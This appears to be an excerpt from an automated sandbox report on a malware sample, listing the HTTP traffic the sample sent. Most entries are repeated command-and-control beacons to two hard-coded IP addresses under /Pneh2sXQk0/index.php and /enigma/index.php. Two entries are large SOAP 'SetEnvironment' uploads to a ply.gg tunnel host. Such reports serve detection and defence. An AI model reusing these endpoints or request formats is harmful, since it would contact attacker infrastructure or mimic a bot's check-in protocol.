r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 193.233.132.56 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95722 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95721 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
